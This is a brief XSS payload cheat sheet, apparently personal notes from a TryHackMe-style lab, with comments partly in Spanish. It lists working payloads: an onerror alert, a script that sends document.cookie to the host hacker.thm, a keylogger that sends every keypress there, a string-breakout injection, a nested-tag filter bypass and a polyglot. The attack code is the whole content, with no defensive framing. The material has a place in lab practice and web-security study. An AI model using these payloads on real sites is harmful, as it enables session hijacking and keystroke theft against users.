Hacktricks:

<img src=x onerror=alert(PAYLOAD)>

steal cookie:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

keylogger
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>


quebrar un código JS que recibe el imput
';alert('THM');//

No HTML inject and script clean:
<sSCRIPTcript> </sSCRIPTcript>

Polyglots:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('el pedro') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
